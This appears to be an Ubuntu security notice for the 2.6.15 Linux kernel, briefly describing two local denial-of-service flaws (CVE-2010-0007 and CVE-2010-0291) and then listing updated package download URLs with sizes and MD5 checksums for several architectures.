Florian Westphal discovered that bridging netfilter rules could be modified by unprivileged users. A local attacker could disrupt network traffic, leading to a denial of service. (CVE-2010-0007)

Al Viro discovered that certain mremap operations could leak kernel memory. A local attacker could exploit this to consume all available memory, leading to a denial of service. (CVE-2010-0291)

Updated packages for Ubuntu 6.06 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.diff.gz
  Size/MD5:  2928444 765d0254f54d27d447de8f0b39548848
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.dsc
  Size/MD5:     2921 682576890de917043eccf6fc9398aed2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz
  Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.82_all.deb
  Size/MD5:  5170062 ef1a9c95890c4ba600a3e5523d49bb59
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.82_all.deb
  Size/MD5:    96386 b184441d2f44037554d037d217688393
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82_all.deb
  Size/MD5: 44742098 b5215eb163e357a179dbf36169ae1fa2

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    22350 d8934981c2fdd09168a5e576cc1b809a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    44768 74be7582e8f82aeb48af59731ce128be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     2312 d464c76f98a4142add7a69aca1305739
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    36294 a65060e99feff7e2ecef38be6d92fbc3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   102366 04d59c868ce03dc83b69116b022735b8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    38892 e80a653bb000e86f38da594d4bc1742d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    49160 a512718368004f81e83063ea8972c871
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   176612 81ab4c185b3af1dea1a082283c1ec9b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    36776 fcb0833daefa645545a2451824094b21
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   142346 3e6446140bfad0b19c512c69377d8026
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    51060 a11ceed7ccb1b96c2a8b2e7f840061b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   140710 e1789bb9d7cdd542a862e8ef209de802
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   287606 f3cc835959f215c209dc5a825596849c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    97828 05627ddbba40a6517ae7f8ca75f195c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1652102 c9eea2df3fdde2a5e7d2f4dff99e6772
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb
  Size/MD5:   872314 6e8f80e117e13665c95fb75593853d49
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb
  Size/MD5:   872448 1a70a906bccd7642241535f79feddb57
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb
  Size/MD5:   874570 0da9cd27666b58b5328e18dbc01c9b2e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb
  Size/MD5:   872194 375aad441654cdcd2338c5809e6319ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_amd64.deb
  Size/MD5:  6926870 c5868857ae3e12da5ffd91ec60d75501
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb
  Size/MD5: 20817720 06e066129d82d4fa8e41a2a058dcb9f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb
  Size/MD5: 20798158 1e5bf064dc2aab9880b30448d06eba9d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb
  Size/MD5: 21635636 0bb9fd3f753b4dcedf70fa8f36c48467
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb
  Size/MD5: 19905244 a04e5f6463fe334c28598cbf13506043
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    15630 8d1da510f959f7b9a2d0aa73ab80ae39
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   240360 20cd65fa275cfe8a83743ddb5a95f528
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   202666 71d8be83541874d6c675945838b9e223
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1048610 9125e9e6c294bb450e37643b3ed7397e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1543634 ff7af4dcfc269a529f0adef3823a7244
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   161692 5623fa9ad6b280d0a5271917e89ca8ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     9832 bd5218587371f5b309ef2d1f77f98420
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    80870 20f034d6199d2902130f8bba12f48afe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    49294 e4a805200acaaea274e67995602294e6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    35158 0869bee234a54b1afe362123606efe66
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    70890 74ad81f0209c505c41d61c143b90f879
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     6218 ab28cdccb61315cac14d9046821e264d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     9060 6b179cd944eb7f83f03147e09025e6be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    57924 5465064d051dec863ad3f4f1a91553f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   123380 18eabdae11c2d77a1694f0cd467107a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   101078 efbe32714c0fed5aec8a70095af299df
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    79272 2fbe8585b11e0fa73fad8e94298082bf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1595398 3e11b94ed4701d1d84b6aeb303782d97
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    72352 e413c3057779de1b3c8f0c4d8d7fb577
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    12648 41487d8dc828d7f94a5c8ed495f06a99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    33806 ebf707126fa6326899d648786afa8779
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   138512 ff1e0d4f0e9c5efc7bbae4d92194da5d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    38938 75eb074224a6373013e621cdd5931a51
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   278876 1586e5c6fc3fedf7f63f19c35a4fd9e8

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    18976 940a7c03cfe47e9d0543f49849c8765f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    43482 466c625f614e3624fa548bc5f96efa74
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   105216 d45ce18fb4d9c2cf5da6d14ae69a86c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     2284 de2293fa5c6e5493307a1913b606ad20
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    34572 4e302b4f7144fd504b2475a4103a3bf5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    97044 eeafb6c943244dd33659e7e7db9a9f76
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    37128 d4d67e516f236bf54a00697b71a3219b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    44122 1657e3520cbd2fbc832cf91bd6366a38
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   167738 7431ddaa7c8f0c9b6e583129cdc839f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    33954 8251d509fb9bacd314f62cc90bda5b96
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   137972 9b8295fffc47ab4cf16ec34f7ef8b7aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    46892 c12096744faa1ca0735b62ea045b0c65
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   133162 5805bb2e2bfab6158d8d217b08079cc2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   273806 be7956f256f494fe4f40e7e7129bdcd7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   102330 d6a81f9c342c0ebe2010b66d4a7c59ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1597678 ab989d0c749b837c67a2a839f139fbb2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.82_i386.deb
  Size/MD5:   863294 c444f51c8b2752c6a7bb7e6890917ae2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.82_i386.deb
  Size/MD5:   862506 1508b314277964abb0d05e8a274d2a26
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.82_i386.deb
  Size/MD5:   863628 69ee54c68825997e29779c3a2ab66625
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb
  Size/MD5:   866414 fa045eb17626dde56b96d70431e9515b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.82_i386.deb
  Size/MD5:   865826 30916e33e56490d9a2acf31c03690e64
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_i386.deb
  Size/MD5:  6918500 a2bb7aa892eb2d21ea3d04f519b72482
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.82_i386.deb
  Size/MD5: 21724666 e1390cea2d5e21dee938aaf3f88786f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.82_i386.deb
  Size/MD5: 22516786 35a5512e74cf490346c35fd56f695fca
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.82_i386.deb
  Size/MD5: 22265258 07155a925272e66ace552f82d16b1b79
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb
  Size/MD5: 23626692 d229112410ce8c9c9947f2f7cd32c883
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.82_i386.deb
  Size/MD5: 23179552 9b108d16a1fc1716b78c4417150e311e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    15512 4a2a37534dc2bc6b0ce12df135d07105
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   238510 544c418a7426a5248e33ff549c6f4035
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   197134 9ec57cc477f5bc4e0dba11002d3988e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1048370 cd87ff58b5cbea9c04eac21cf1b0784c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1741406 0b97758852f283e148ec2ce290e678ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   160884 ce6d2a16b8a3af5706b694fe6f8ac4f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     9162 d5f4619ccc32c2ed8296823cd3c19e3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    76468 9f0911cef3a4b7afb14f1bd537ad337e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    53554 afc415fd0a28c363579986fc48464671
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    33048 c710f55e8853bec0935df3338f2370c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    85618 b6ed96be15afaf31e6670a78ff1f4733
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     6024 b0a622b932e40a7011d5e9ec9bd21eb3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     8762 6234ceb3aa1422433ee60ad4305c03e7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    53636 e1a35b8801fb949295040028cd2cba5e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   130970 25d88aae6168f72c58ca17584b3f83e0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    98468 ddb974591a687460f50c26a2e2682593
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    77212 a9ec9f2fe551ec07e56200b26f1de4f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1768830 477e2985e9f1fd2d4f333d651ce07e2f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    69612 2547b29a65a8391d3a085bbf2ce476aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    11764 88566d97534c428d1ef6b01b5adde2ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    36102 10638cf7adf98d9afcc1e1475dbaf05c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   132672 fa6f13f8c0c0d017f50dc160bf2961fc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    38578 32976528861368cdb936d5db4fc0c2b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   299158 458051a07217501718f6e2a742bec0a3

powerpc architecture (Apple Macintosh G3/G4/G5):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    23726 0fbb9855c5833cb24187a701c10cdfbe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    26006 87108baca7e8450f580be0f6c77d95de
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    49328 c6fe9fa1f1e132f4906b21e555bfb079
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    51536 d2c7a02ac033097208c359312e95d246
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     2308 5b98b064d0e5c18d8c32caa86b2e43e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     2482 3c964c577c93d80cee55d06e78003951
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    40306 ad5c5c36d7dc08add999f8cf47d53b72
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    43848 0cfb559dfe56e4a50c99537f98392827
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   112606 9994a8d2bb1c9a45cf43416faca7f9fe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   120734 092bb2c1dfcece144429a277f96b56e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    40906 84f84dc75718a347eb6623204cab6209
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    45996 69f5b1a8a9e82414d868ae459109f32c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    29024 1a12ad8c384bd5195208ce7eb478c011
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    29892 4a807f384985ae3376d509474716f13a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   211398 2e302e02bf08226ad9bf45c3a04840b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   225174 0c4edfa7ccdb502d5aefc7b02a2e81e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    45054 a2373aac90339698b2cba11e43978565
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    40220 06b0e3234fd6b0125df72fc04c4d0562
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     1934 0887612df6acbc867949c33251427c00
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:     2198 d38a4ec22579275ff2f48805be734356
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    80760 0a71c80867de5b11bd73c9c6d2751448
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    86134 0531dff0f43a6073ae4e71e93e1d77ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   111580 ab42bedd2a1e1687015d5b6b4b327484
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   125734 3c526ccc2348c1f6dd65829c96fb1381
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    53412 13f7a9a412c8c38c4a22a0f4db2a2bd9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:    58486 0a62b4bc8aa5f594de9efc6b9f1dec6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   147964 9751a30ed03bc5bde2b48be1e5dce6e3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   161908 70564b18529d383509cb4c1d4898425a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   318412 7944aa213ac28d37d390b48b3d5a9a8d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb
  Size/MD5:   288032 2b93681e1b268517863ee4bf27ba0899
